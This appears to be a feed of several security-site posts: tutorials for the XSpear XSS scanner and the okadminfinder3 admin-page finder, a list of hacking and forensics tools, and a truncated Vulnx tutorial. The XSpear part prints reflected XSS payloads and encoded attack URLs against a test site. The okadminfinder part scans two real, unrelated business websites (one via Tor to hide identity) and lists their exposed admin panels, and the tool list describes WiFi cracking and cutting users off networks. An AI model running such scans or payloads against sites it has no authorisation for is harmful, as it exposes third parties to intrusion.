XSpear is powerful analyzing XSS tool used to find XSS vulnerabilities in any web application. XSpear gives different features for testing request & response for XSS protection. XSpear is also used in finding blind XSS vulnerabilities.

• For testing, we will use Kali Linux 2018.4 amd64.
• Open terminal type sudo apt-get update.
• Make sure GEM is installed in your system.
• Type sudo apt-get install gem
• Type git clone https://github.com/hahwul/XSpear.git
• Type cd XSpear
• Type ls
• Type chmod u+x XSpear-1.3.1.gem
• Type gem install XSpear-1.3.1.gem
• Type ls -ltr
• Type nano Gemfile & enter the text gem ‘XSpear’

root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/hahwul/XSpear.git
 Cloning into 'XSpear'…
 remote: Enumerating objects: 256, done.
 remote: Counting objects: 100% (256/256), done.
 remote: Compressing objects: 100% (167/167), done.
 remote: Total 617 (delta 137), reused 164 (delta 71), pack-reused 361
 Receiving objects: 100% (617/617), 833.55 KiB | 561.00 KiB/s, done.
 Resolving deltas: 100% (332/332), done.
root@kali:/home/iicybersecurity/Downloads# cd XSpear/

root@kali:/home/iicybersecurity/Downloads/XSpear# ls
 bin                 config.json  forBurp  lib          Rakefile        README.md  XSpear-1.3.1.gem
 CODE_OF_CONDUCT.md  exe          Gemfile  LICENSE.txt  raw_sample.txt  spec       XSpear.gemspec

 root@kali:/home/iicybersecurity/Downloads/XSpear# chmod u+x XSpear-1.3.1.gem

root@kali:/home/iicybersecurity/Downloads/XSpear# ls -ltr
 total 112
 -rw-r--r-- 1 root root  2168 Jan  4 02:51 XSpear.gemspec
 -rwxr--r-- 1 root root 31744 Jan  4 02:51 XSpear-1.3.1.gem
 -rw-r--r-- 1 root root 27592 Jan  4 02:51 README.md
 -rw-r--r-- 1 root root   117 Jan  4 02:51 Rakefile
 -rw-r--r-- 1 root root  1073 Jan  4 02:51 LICENSE.txt
 drwxr-xr-x 2 root root  4096 Jan  4 02:51 exe
 -rw-r--r-- 1 root root   108 Jan  4 02:51 config.json
 -rw-r--r-- 1 root root  3224 Jan  4 02:51 CODE_OF_CONDUCT.md
 drwxr-xr-x 2 root root  4096 Jan  4 02:51 bin
 drwxr-xr-x 3 root root  4096 Jan  4 02:51 lib
 drwxr-xr-x 2 root root  4096 Jan  4 02:51 forBurp
 drwxr-xr-x 2 root root  4096 Jan  4 02:51 spec
 -rw-r--r-- 1 root root   404 Jan  4 02:51 raw_sample.txt
 -rwxr--r-- 1 root root    96 Jan  4 02:57 Gemfile
 -rw-r--r-- 1 root root   641 Jan  4 03:08 Gemfile.lock

root@kali:/home/iicybersecurity/Downloads/XSpear# gem install XSpear-1.3.1.gem
 warning: Passing whitelist_classes with the 2nd argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, whitelist_classes: …) instead.
 warning: Passing whitelist_symbols with the 3rd argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, whitelist_symbols: …) instead.
 warning: Passing aliases with the 4th argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, aliases: …) instead.
 warning: Passing whitelist_classes with the 2nd argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, whitelist_classes: …) instead.
 warning: Passing whitelist_symbols with the 3rd argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, whitelist_symbols: …) instead.
 warning: Passing aliases with the 4th argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, aliases: …) instead.
 warning: Passing whitelist_classes with the 2nd argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, whitelist_classes: …) instead.
 warning: Passing whitelist_symbols with the 3rd argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, whitelist_symbols: …) instead.
 warning: Passing aliases with the 4th argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, aliases: …) instead.
 warning: Passing whitelist_classes with the 2nd argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, whitelist_classes: …) instead.

• If any error occurs while configuring GEM. Type below commands.
  • gem install selenium-webdriver
  • gem install terminal-table
  • gem install progress_bar
• Type bundle

root@kali:/home/iicybersecurity/Downloads/XSpear# bundle
 Don't run Bundler as root. Bundler can ask for sudo if it is needed, and installing your bundle as root
 will break this application for all non-root users on this machine.
 Fetching gem metadata from https://rubygems.org/………
 Resolving dependencies…
 Using colorize 0.8.1
 Using highline 2.0.3
 Using options 2.3.2
 Using progress_bar 1.3.1
 Using childprocess 3.0.0
 Using rubyzip 2.0.0
 Using selenium-webdriver 3.142.7
 Using unicode-display_width 1.6.0
 Using terminal-table 1.8.0
 Using XSpear 1.3.1
 Using bundler 2.0.1
 Bundle complete! 1 Gemfile dependency, 11 gems now installed.
 Use bundle info [gemname] to see where a bundled gem is installed.

• Type XSpear –help

root@kali:/home/iicybersecurity/Downloads/XSpear# XSpear --help

    )  (
 ( /(  )\ )
 )\())(()/(          (     )  (
((_)\  /(_))`  )    ))\ ( /(  )(
__((_)(_))  /(/(   /((_))(_))(()\
\ \/ // __|((_)_\ (_)) ((_)_  ((_)
 >  < \__ \| '_ \)/ -_)/ _` || '_|
/_/\_\|___/| .__/ \___|\__,_||_|    />
           |_|                   \ /<
{\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
                                 / \<
                                    \>       [ v1.3.1 ]

Usage: xspear -u [target] -[options] [value]
 json
 [ Options ]
     -u, --url=target_URL             [required] Target Url
     -d, --data=POST Body             [optional] POST Method Body data
     -a, --test-all-params            [optional] test to all params(include not reflected)
         --headers=HEADERS            [optional] Add HTTP Headers
         --cookie=COOKIE              [optional] Add Cookie
         --raw=FILENAME               [optional] Load raw file(e.g raw_sample.txt)
     -p, --param=PARAM                [optional] Test paramters
     -b, --BLIND=URL                  [optional] Add vector of Blind XSS

• Starting with given examples, type XSpear -u ‘http://testphp.vulnweb.com/listproducts.php?cat=123’ -v 2
• Testphp.vulnweb.com is used for testing URL.
• -u is used for target URL.
• -v is used for verbose, v – 2 shows the scanning logs.

root@kali:/home/iicybersecurity/Downloads/XSpear# XSpear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2

    )  (
 ( /(  )\ )
 )\())(()/(          (     )  (
((_)\  /(_))`  )    ))\ ( /(  )(
__((_)(_))  /(/(   /((_))(_))(()\
\ \/ // __|((_)_\ (_)) ((_)_  ((_)
 >  < \__ \| '_ \)/ -_)/ _` || '_|
/_/\_\|___/| .__/ \___|\__,_||_|    />
           |_|                   \ /<
{\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
                                 / \<
                                    \>       [ v1.3.1 ]

Analyzing Request

[*] analysis request..
[-] [03:10:39] [200/OK] 'STATIC' not reflected
[-] [03:10:39] [200/OK] 'cat' not reflected <script>alert(45)</script>
[I] [03:10:39] [200/OK] [param: cat][Found SQL Error Pattern]
[I] [03:10:39] [200/OK] reflected rEfe6[param: cat][reflected parameter]
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]
w[I] [03:10:44] [200/OK] reflected onhwul=64[param: cat][reflected EH on{any} pattern]
[-] [03:11:14] [200/OK] 'cat' not reflected <img/src onerror=alert(45)>
[-] [03:11:15] [200/OK] 'cat' not reflected <svg/onload=alert(45)>
[H] [03:11:15] [200/OK] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
[H] [03:11:16] [200/OK] reflected <select autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
[H] [03:11:16] [200/OK] reflected <textarea autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
[H] [03:11:16] [200/OK] reflected <details/open/ontoggle="alert`45`">[param: cat][reflected HTML5 XSS Code]
[H] [03:11:16] [200/OK] reflected <video/poster/onerror=alert(45)>[param: cat][reflected HTML5 XSS Code]
[-] [03:11:16] [200/OK] 'cat' not reflected <script>alert(45)</script>
[H] [03:11:16] [200/OK] reflected <marquee onstart=alert(45)>[param: cat][reflected HTML5 XSS Code]
[H] [03:11:16] [200/OK] reflected <input autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
[H] [03:11:17] [200/OK] reflected <audio src onloadstart=alert(45)>[param: cat][reflected HTML5 XSS Code]
[H] [03:11:17] [200/OK] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code]
[H] [03:11:17] [200/OK] reflected <meter onmouseover=alert(45)>0</meter>[param: cat][reflected HTML5 XSS Code]
[H] [03:11:18] [200/OK] reflected <keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
[*] finish scan. the report is being generated..
+----+-------+------------------+--------+-------+----------------------------------------+------------------------------+

Scanning Logs

Detailed Scanning Logs

< Available Objects >
[cat] param
 + Available Special Char: ( ' ) { ` \ } $ [ ] :
 + Available Event Handler: "onabort","onauxclick","onactivate","onanimationcancel","onafterscriptexecute","onanimationstart","onafterprint","onbeforeactivate","onafterupdate","onbeforecut","onbegin","onbeforedeactivate","onbeforeprint","onbeforeunload","onbeforecopy","onbeforepaste","onbeforeeditfocus","onbeforescriptexecute","onbeforeupdate","oncanplaythrough","onblur","onbounce","onclick","oncanplay","oncontextmenu","oncellchange","oncopy","oncontrolselect","onchange","ondatasetcomplete","ondragdrop","ondatasetchanged","ondragend","ondblclick","ondataavailable","oncut","ondeactivate","ondragenter","ondrag","onfocus","onerror","ondragstart","onend","onfinish","onerrorupdate","ondragleave","ondragover","ondrop","onfilterchange","onhashchange","onkeyup","onfocusout","oninvalid","onkeypress","oninput","onfocusin","onhelp","onkeydown","onlayoutcomplete","onloadstart","onlosecapture","onload","onloadend","onmediacomplete","onmediaerror","onmousedown","onmouseenter","onmessage","onloadstart","onmousemove","onmouseout","onoffline","onmouseup","onmouseleave","onmove","onmovestart","onmousewheel","onmoveend","onmouseover","onpageshow","onpause","onplay","onoutofsync","onpaste","ononline","onpointerleave","onpointerenter","onpointerdown","onplaying","onpointerout","onpopstate","onpointermove","onpointerover","onredo","onprogress","onreadystatechange","onrepeat","onpointerup","onpropertychange","onresizestart","onrowdelete","onresizeend","onreset","onreverse","onrowinserted","onrowexit","onresume","onresize","onrowsenter","onselectionchange","onsearch","onseek","onstop","onselect","onscroll","onselectstart","onstorage","onstart","onsubmit","ontimeupdate","onsyncrestored","ontimeerror","ontouchend","ontouchmove","ontrackchange","ontoggle","ontouchstart","ontransitionend","ontransitioncancel","onurlflip","onunhandledrejection","onvolumechange","ontransitionrun","onwaiting","whatthe=\"\"onload","onundo","onwheel","onunload"
 + Available HTML Tag: "script","audio","video","img","iframe","svg","style","frame","meta","object","embed","frameset","applet"
 + Available Useful Code: "document.cookie","document.location","window.location"

Useful Codes for Gathering Cookies, location

 + Available Useful Code: "document.cookie","document.location","window.location"

< Raw Query >
[0] http://testphp.vulnweb.com/listproducts.php?-
[1] http://testphp.vulnweb.com/listproducts.php?-
[2] http://testphp.vulnweb.com/listproducts.php?-
[3] http://testphp.vulnweb.com/listproducts.php?-
[4] http://testphp.vulnweb.com/listproducts.php?-
[5] http://testphp.vulnweb.com/listproducts.php?cat=123XsPeaR%22
[6] http://testphp.vulnweb.com/listproducts.php?cat=123rEfe6
[7] http://testphp.vulnweb.com/listproducts.php?cat=123%5C%22%3E%3Cxspear%20onhwul=64%3E
[8] http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E
[9] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cselect%20autofocus%20onfocus=alert(45)%3E
[10] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Ctextarea%20autofocus%20onfocus=alert(45)%3E
[11] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cdetails/open/ontoggle=%22alert%6045%60%22%3E
[12] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cvideo/poster/onerror=alert(45)%3E
[13] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cmarquee%20onstart=alert(45)%3E
[14] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cinput%20autofocus%20onfocus=alert(45)%3E
[15] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Caudio%20src%20onloadstart=alert(45)%3E
[16] http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Ciframe/src=JavaScriPt:alert(45)%3E
[17] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cmeter%20onmouseover=alert(45)%3E0%3C/meter%3E
[18] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Ckeygen%20autofocus%20onfocus=alert(45)%3E

• XSpear results are based on five types.
  • VULN – Vulnerable used for checking alerts or prompts.
  • LOW – Low level Issues
  • MEDIUM – Medium Level Issue
  • HIGH – High Level Issue
  • INFO – Getting Information ex – reflected parameters, sql error.
• Detailed report is shown in tabular form. Starting for INFO to HIGH level of XSS attacks. In HIGH alerts, XSpear is triggering on onfocus alerts with mouseover & javascript errors.
• XSpear also has a provision to test all parameter and user can also add header/cookie to the request for testing purpose.

The post Scan any URL for XSS (cross site scripting) vulnerability appeared first on Information Security Newspaper | Hacking News.

• For testing we will use Kali Linux 2018.4 amd64. Open terminal type git clone https://github.com/mIcHyAmRaNe/okadminfinder3.git
• Type cd okadminfinder3/
• Run ls
• Then type chmod u+x requirements.txt
• Type ls -ltr

root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/mIcHyAmRaNe/okadminfinder3.git
 Cloning into 'okadminfinder3'…
 remote: Enumerating objects: 264, done.
 remote: Total 264 (delta 0), reused 0 (delta 0), pack-reused 264
 Receiving objects: 100% (264/264), 231.98 KiB | 293.00 KiB/s, done.
 Resolving deltas: 100% (139/139), done.
root@kali:/home/iicybersecurity/Downloads# cd okadminfinder3/
root@kali:/home/iicybersecurity/Downloads/okadminfinder3# ls
 Classes  LICENSE  LinkFile  okadminfinder.py  README.md  requirements.txt
root@kali:/home/iicybersecurity/Downloads/okadminfinder3# chmod u+x requirements.txt
root@kali:/home/iicybersecurity/Downloads/okadminfinder3# ls -ltr
 total 48
 -rwxr--r-- 1 root root    77 Jan  2 01:54 requirements.txt
 -rw-r--r-- 1 root root  3598 Jan  2 01:54 README.md
 -rwxr-xr-x 1 root root 18022 Jan  2 01:54 okadminfinder.py
 drwxr-xr-x 2 root root  4096 Jan  2 01:54 LinkFile
 -rw-r--r-- 1 root root 11347 Jan  2 01:54 LICENSE
 drwxr-xr-x 3 root root  4096 Jan  2 01:54 Classes

• Type pip3 install -r requirements.txt

root@kali:/home/iicybersecurity/Downloads/okadminfinder3# pip3 install -r requirements.txt
 Collecting colorama==0.4.1 (from -r requirements.txt (line 1))
   Downloading https://files.pythonhosted.org/packages/4f/a6/728666f39bfff1719fc94c481890b2106837da9318031f71a8424b662e12/colorama-0.4.1-py2.py3-none-any.whl
 Collecting requests==2.21.0 (from -r requirements.txt (line 2))
   Cache entry deserialization failed, entry ignored
   Downloading https://files.pythonhosted.org/packages/7d/e3/20f3d364d6c8e5d2353c72a67778eb189176f08e873c9900e10c0287b84b/requests-2.21.0-py2.py3-none-any.whl (57kB)
     100% |████████████████████████████████| 61kB 81kB/s
 Requirement already satisfied: PySocks==1.6.8 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 3)) (1.6.8)
 Requirement already satisfied: argparse==1.4.0 in /usr/local/lib/python3.7/dist-packages (from -r requirements.txt (line 4)) (1.4.0)
 Requirement already satisfied: tqdm==4.31.1 in /usr/local/lib/python3.7/dist-packages (from -r requirements.txt (line 5)) (4.31.1)
 Requirement already satisfied: idna<2.9,>=2.5 in /usr/lib/python3/dist-packages (from requests==2.21.0->-r requirements.txt (line 2)) (2.6)
 Requirement already satisfied: certifi>=2017.4.17 in /usr/lib/python3/dist-packages (from requests==2.21.0->-r requirements.txt (line 2)) (2018.8.24)
 Requirement already satisfied: chardet<3.1.0,>=3.0.2 in /usr/lib/python3/dist-packages (from requests==2.21.0->-r requirements.txt (line 2)) (3.0.4)
 Requirement already satisfied: urllib3<1.25,>=1.21.1 in /usr/lib/python3/dist-packages (from requests==2.21.0->-r requirements.txt (line 2)) (1.22)
 Installing collected packages: colorama, requests
   Found existing installation: colorama 0.3.9
     Uninstalling colorama-0.3.9:
       Successfully uninstalled colorama-0.3.9
   Found existing installation: requests 2.22.0
     Uninstalling requests-2.22.0:
       Successfully uninstalled requests-2.22.0
 Successfully installed colorama-0.4.1 requests-2.21.0

• Type ./okadminfinder.py –help

root@kali:/home/iicybersecurity/Downloads/okadminfinder3# ./okadminfinder.py --help

     ____  __ __          __          _       _______           __
    / __ \/ //_/___ _____/ /___ ___  (_)___  / ____(_)___  ____/ /__  _____
   / / / / ,< / __ `/ __  / __ `__ \/ / __ \/ /_  / / __ \/ __  / _ \/ ___/
  / /_/ / /| / /_/ / /_/ / / / / / / / / / / __/ / / / / / /_/ /  __/ /
  \____/_/ |_\__,_/\__,_/_/ /_/ /_/_/_/ /_/_/   /_/_/ /_/\__,_/\___/_/
     version 2.5.3 created by O.Koleda & rewrited by mIcHy AmRaNe

usage: okadminfinder.py [-h] [-u URL] [-t] [-p PROXY] [-rp] [-r] [-v] [-U] [-i]
 optional arguments:
   -h, --help               show this help message and exit
   -u URL, --url URL        Target URL (e.g. 'www.example.com' or 'example.com')
   -t, --tor                Use Tor anonymity network
   -p PROXY, --proxy PROXY  Use an HTTP proxy (e.g '127.0.0.1:8080')
   -rp, --random-proxy      Use randomly selected proxy server
   -r, --random-agent       Use randomly selected User-Agent
   -v, --verbose            Display more informations
   -U, --update             Update OKadminFinder
   -i, --interactive        Interactive interface[other arguments not required]

• Type ./okadminfinder.py -u testphp.vulnweb.com
• Testphp.vulnweb.com is common testing website. Used for running various scans.
• You can also use proxies or TOR service for hiding your identity.
• Type ./okadminfinder.py -u testphp.vulnweb.com OR type ./okadminfinder.py -r -u testphp.vulnweb.com
• -r is used for random user agent.
• -u is used for target URL. Target URL is testphp.vulnweb.com

root@kali:/home/iicybersecurity/Downloads/okadminfinder3# ./okadminfinder.py -u testphp.vulnweb.com

     ____  __ __          __          _       _______           __
    / __ \/ //_/___ _____/ /___ ___  (_)___  / ____(_)___  ____/ /__  _____
   / / / / ,< / __ `/ __  / __ `__ \/ / __ \/ /_  / / __ \/ __  / _ \/ ___/
  / /_/ / /| / /_/ / /_/ / / / / / / / / / / __/ / / / / / /_/ /  __/ /
  \____/_/ |_\__,_/\__,_/_/ /_/ /_/_/_/ /_/_/   /_/_/ /_/\__,_/\___/_/
     version 2.5.3 created by O.Koleda & rewrited by mIcHy AmRaNe

Site testphp.vulnweb.com is stable
 Processing …:   0%|                                                                          |0/574
     [] http://testphp.vulnweb.com/admin/                         Admin page found!
 Processing …:   1%|▉                                                                         |7/574
     [] http://testphp.vulnweb.com/login.php                      Admin page found!

• Above shows the admin page of testphp.vulnweb.com

• Above you can refer admin page of the website.
• Let’s try on another sites.
• Type ./okadminfinder.py -u www.arifhabib.com.pk
• -u is used for target URL. Target URL – www.arifhabib.com.pk

root@kali:/home/iicybersecurity/Downloads/okadminfinder3# ./okadminfinder.py -u www.arifhabib.com.pk

    ____  __ __          __          _       _______           __
    / __ \/ //_/___ _____/ /___ ___  (_)___  / ____(_)___  ____/ /__  _____
   / / / / ,< / __ `/ __  / __ `__ \/ / __ \/ /_  / / __ \/ __  / _ \/ ___/
  / /_/ / /| / /_/ / /_/ / / / / / / / / / / __/ / / / / / /_/ /  __/ /
  \____/_/ |_\__,_/\__,_/_/ /_/ /_/_/_/ /_/_/   /_/_/ /_/\__,_/\___/_/
     version 2.5.3 created by O.Koleda & rewrited by mIcHy AmRaNe

Site www.arifhabib.com.pk is stable
 Processing …:   2%|█▋                                                                       |13/574
     [] http://www.arifhabib.com.pk/cpanel/                       Admin page found!
 Processing …:  32%|███████████████████████▎                                                |186/574
     [] http://www.arifhabib.com.pk/controlpanel/                 Admin page found!
 Processing …: 100%|████████████████████████████████████████████████████████████████████████|574/574
 Completed
 2 Admin pages found
 574 total pages scanned
   [/] Scanning over; Press Enter to Exit

• Opening the webpage in web browser.

• Knowing admin page of any website puts an potential risk to website owner.
• Now we try with TOR anonymity.
• Type ./okadminfinder.py –tor -u exide.com.pk/
• –tor – It will used TOR service for finding target website admin page.
• For starting type sudo service tor start
• For checking TOR service running status. Type ps -ef | grep tor
• -u is used for target URL. Target URL – exide.com.pk/

root@kali:/home/iicybersecurity/Downloads/okadminfinder3# ./okadminfinder.py --tor -u exide.com.pk/   

     ____  __ __          __          _       _______           __
    / __ \/ //_/___ _____/ /___ ___  (_)___  / ____(_)___  ____/ /__  _____
   / / / / ,< / __ `/ __  / __ `__ \/ / __ \/ /_  / / __ \/ __  / _ \/ ___/
  / /_/ / /| / /_/ / /_/ / / / / / / / / / / __/ / / / / / /_/ /  __/ /
  \____/_/ |_\__,_/\__,_/_/ /_/ /_/_/_/ /_/_/   /_/_/ /_/\__,_/\___/_/
     version 2.5.3 created by O.Koleda & rewrited by mIcHy AmRaNe

Site exide.com.pk/ is stable
 Processing …:   0%|                                                                          |0/574
     [] http://exide.com.pk//admin/                               Admin page found!
 Processing …:   2%|█▋                                                                       |13/574
     [] http://exide.com.pk//cpanel/                              Admin page found!
 Processing …:   3%|█▉                                                                       |15/574
     [] http://exide.com.pk//dashboard                            Admin page found!
 Processing …:   3%|██▎                                                                      |18/574
     [] http://exide.com.pk//wp-login.php/                        Admin page found!
 Processing …:   5%|███▎                                                                     |26/574
     [] http://exide.com.pk//wp-admin/                            Admin page found!
 Processing …:   8%|██████                                                                   |48/574
     [] http://exide.com.pk//admin/index.php                      Admin page found!

• Opening the exide admin page.

• Above shows the admin page using TOR proxies. It might take time while using TOR. But it will find the available admin page.

Check youtube link to see the practical of okadminfinder3

• Okadminfinder3 will use pre-build common list of admin logins, which are commonly found on any website admin panel. Below you can checkout listed keywords.
• You will find the file with name of adminpanellinks.txt
• Type cat adminpanellinks.txt

root@kali:/home/iicybersecurity/Downloads/okadminfinder3/LinkFile# cat adminpanellinks.txt
 %s/admin/
 %s/admin.asp/
 %s/admin/admin.asp/
 %s/admin.aspx/
 %s/admin/admin.aspx/
 %s/admin.php/
 %s/administrator/
 %s/login.php
 %s/admin.php
 %s/user/
 %s/usuarios/
 %s/usuario/
 %s/Admin/
 %s/cpanel/
 %s/phpmyadmin/
 %s/dashboard
 %s/cms/
 %s/users/
 %s/wp-login.php/
 %s/admin/login
 %s/auth/login/
 %s/moderator/
 %s/webadmin/
 %s/webmaster/
 %s/adminarea/
 %s/bb-admin/
 %s/wp-admin/
 %s/wp-login/
 %s/wp-admin.php
 %s/userlogin/
 %s/logins/
 %s/login.html
 %s/adminLogin/
 %s/admin_area/
 %s/panel-administracion/
 %s/instadmin/
 %s/memberadmin/
 %s/administratorlogin/
 %s/panel/
 %s/forum/admin
 %s/adm/
 %s/cp/
 %s/vue-element-admin
 %s/admin/cp.php
 %s/cp.php
 %s/admincontrol/
 %s/admincp/
 %s/admin/account.php
 %s/admin/index.php
 %s/admin/login.php
 %s/admin/admin.php
 %s/admin_area/admin.php
 %s/admin_area/login.php
 %s/siteadmin/login.php
 %s/siteadmin/index.php
 %s/siteadmin/login.html
 %s/admin/account.html
 %s/admin/index.html
 %s/admin/login.html

The post Find Hidden Admin Page Of Any Website appeared first on Information Security Newspaper | Hacking News.

This will covers tools from following areas:

• Ethical Hacking
• Digital Forensics Tools
• Reverse Engineering Tools
• Mobile Hacking

Top Ethical Hacking Tools

NMAP

Nmap is very popular among every pentester/ security researchers. Nmap scans server for open ports, services of any IP address. Nmap sends no. of packets & rely on responses. Nmap has no. of options to scan for any IP address. This tools has developed for different OS platforms. Nmap has also GUI version.

For downloading tool go to : https://nmap.org/

WPSCAN

WPSCAN is used to find vulnerabilities in wordpress. WPScan finds vulnerabilities in wordpress websites. This tool is known for scanning vulnerabilities within the core version, plugins and themes of wordpress website. WPScan even finds weak passwords, users and security configuration issues that are present on web applications.

For downloading WPSCAN : https://github.com/wpscanteam/wpscan

TRAPE

Trape is an OSINT research tool used in tracking people & executes the social engineering attacks in real time. Trape was developed to show how large internet companies can obtain confidential information. Trape can collect information like sessions of website, services to control users through browsers without telling them. The main aim is to help government organization, researchers & companies to find cyber criminals.

For downloading trape : https://github.com/jofpin/trape

OSMEDEUS

Osemdeus is an fully automated offensive tool used for vulnerability scanning and reconnaissance. It allows to run bunch of different scans together & finding vulnerability of your target. Some features which are provided by osmedeus are : subdomain scan. screenshot the target, basic recon like whois, Dig info & many other features, which are required in initial phases of pentesting.

For downloading osmedeus : https://github.com/j3ssie/Osmedeus

Metasploit

Metasploit is another popular used for social engineering attacks, getting reverse shell. This tools is available for all popular platforms. Metasploit comes with pre-build payloads which are used for testing. Metasploit is widely used tool & their are many contributors which have helped metasploit to grow. You can also opt out for Kali Linux where you will find metasploit to be pre-installed.

For downloading metsploit : https://github.com/rapid7/metasploit-framework

Top Digital Forensics Tools

SANS-SIFT

SIFT consists different forensics toolkit based on Ubuntu OS. It includes all the tools you need in forensic of incident response. SIFT can also perform advanced investigations & responds to intrusions using open source tools. SIFT supports many different formats such as Advanced Forensic Format, RAW Formats. Some other features such as timeline from system logs. SIFT provides cross compatibility between Windows & Linux.

For downloading SIFT : https://digital-forensics.sans.org/community/downloads

X-Way Forensics

X-way forensics is an advanced work environment used in computer forensics. X-ways forensics is very reliable & lightweight tool uses very minimum resources. This tool finds deleted files & offers many features that other forensics tools lack. X-ways forensics runs through USB stick on any Windows OS. X-way forensics offers disk cloning & imaging. This tool has feature to read partitioning & file system structures inside raw.

Download X-Way Forensics : http://www.x-ways.net/forensics/

The Sleuth Kit & Autopsy

The Sleuth kit comes with bunch of command line linux tools which analyze different disk images & recover files from disk images. The Sleuth kit is used to find file system data. The plug in allows to incorporate modules. Autopsy is GUI based program used to analyze hard drives & other storage devices. Autopsy has plugin architecture which helps to find modules or develop custom modules.

Download The Sleuth Kit & Autopsy : https://www.sleuthkit.org/autopsy/

Helix

Helix is an live CD based forensic suite used in incident response. It comes with many open source digital forensic tools. Helix offers hex editors, data carving, password cracking tools. This tool collects data from physical memory, network connection, user accounts, & many other features. Helix analyzes and compiles results in a reports.

For downloading helix : https://www.e-fense.com/products.php

CAINE

Caine (Computer Aided Investigative Environment) is another Linux distros which contains many digital forensics tools. The later versions of Caine is based on Ubuntu Linux. Caine offers user friendly interface & optimized environment to conduct a forensic analysis. Caine offers different digital forensic tools FTKImagerLit, Hex_editor, Nirsoft & many other tools which are used to gather or recover different files.

Download Caine : https://www.caine-live.net/

Top Reverse Engineering Tools

OllyDbg

OllyDbg is an 32 bit assembler used for analyzing different windows executable. With Ollydbg you can trace the registers, find procedures,. loops, API calls, tables & many other features. Ollydbg debugs multi thread applications. This tools supports MASM & IDEAL formats.

Download OllyDbg : http://www.ollydbg.de/

Ghidra

Ghidra is an popular reverse engineering tool used by NSA in analyzing suspicious or malicious executable. Ghidra is used to reversing the source code of any exe. Ghidra helps to analyze malware, bugs or viruses. Ghidra helps in giving proper understanding to reverse engineers, pentesters.

Download Ghidra : https://ghidra-sre.org/

Distorm3

Distorm3 is designed for fast decomposing libraries. It disassembles instructions in 32 & 64 bit modes. Distorm3 is the fastest dissembler library. Distorm3 offers clean & readable source code. Distorm3 entirely depends on C library. That’s why it can be used in Kernel modules.

Download distorm3 : https://github.com/gdabah/distorm

IDA Pro

IDA is designed for static analysis to ollydbg & 64dbg. IDA is an cross platform dissembler. It is mostly used in professional debugging. You can use its non-commercial version in reverse engineering. For using such product commercially you have to purchase commercial license. IDA Pro offers powerful dissembler. It supports different OS’s. IDA Pro supports x86 & x64 architecture. IDA Pro contains built in debuggers.

Download IDA Pro : https://www.hex-rays.com/products/ida/

WinHex

Winhex is designed for opening windows executable’s. Used as hexadecimal editor. Winhex mostly used by computer forensic investigators. Winhex consumes less memory, recovers deleted files from hard disks. Winhex is also compatible with floppy disks, CD-ROM & DVD. It supports different file formats. Winhex provides access to physical RAM & other resources.

Download Winhex : https://www.x-ways.net/winhex/

Top Mobile Hacking Tools

Kali Linux Net Hunter

Not to mention, Kali Linux most popular OS for penetration testing & also used by many security researchers. You have to install Kali Linux with Wifite for cracking WiFi passwords. Kali Linux net hunter in most android devices. Linux requires very less no. of memory resources to run.

Download Kali Linux net hunter : https://www.offensive-security.com/kali-linux-nethunter-download/

Reaver For Android

Reaver is an popular application for cracking Wifi passwords. Users don’t need any technical expertise to crack wifi password using such applications. Reaver offers easy to use features. Users can view list of access points & stations. Users can see activity of specific user. Reaver shown the AP of any manufacturer device. Saves the packets in .cap file. Sends the de-authentication to all connected users.

Download Reaver : https://forum.xda-developers.com/showthread.php?t=2456888

Dex2jar

Dex2jar is designed to decompile the android applications. It is used to read dalvik executable.

Download dex2jar : https://github.com/pxb1988/dex2jar

Apktool

apktool is another tool designed to reverse engineering Android apk files. Decodes the android apk codes closely to its native original form. Users can even modify android applications with apktool. Apktool also help in repeating the tasks.

Download apktool : https://github.com/iBotPeaches/Apktool

WifiKill

Wifikill is used in banning other users on same network. With wifikill you can block the users, grab traffic, showing websites of grabbed devices. Showing network names of devices. Wifikill supports above 4.x versions.

Download Wifikill : http://paranoid.me/wifikill/downloader/

The post List of Top Hacking Tools of 2019 appeared first on Information Security Newspaper | Hacking News.

Vulnx is used to find vulnerabilities in different types of CMS. Vulnx scan for subdomains, port scan, IP address, country, region. Vulnx is designed to automate your pentesting.

• For testing we have used Kali Linux 2018.2. Make ensure python3 is installed.
  • Type sudo apt-get update
  • Type sudo apt-get install python3
• Type git clone https://github.com/anouarbensaad/vulnx.git

root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/anouarbensaad/vulnx.git
 Cloning into 'vulnx'…
